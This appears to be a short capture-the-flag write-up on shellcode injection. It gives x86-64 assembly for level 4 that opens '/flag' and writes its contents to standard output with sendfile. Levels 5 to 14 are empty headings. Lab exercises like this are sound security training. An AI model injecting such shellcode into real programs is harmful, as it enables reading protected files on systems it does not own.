shellcode injection
level 4
.intel_syntax noprefix
.global _start
_start:
call pwn
.string "/flag"
.byte 0x00
pwn:
; open(flag, 0)
xor eax, eax
xor esi, esi
xor edx, edx
xor r10d, r10d
push [rsp]
pop rdi
mov sil, 0
mov al, 2
syscall
; sendfile(1, rax, 0, 0x100)
xor edi, edi
mov dil, 1
mov sil, al
mov dl, 0
mov r10, 0x100
mov al, 40
syscalllevel 5
level 6
level 7
level 8
level 9
level 10
level 11
level 12
level 13
level14
Last updated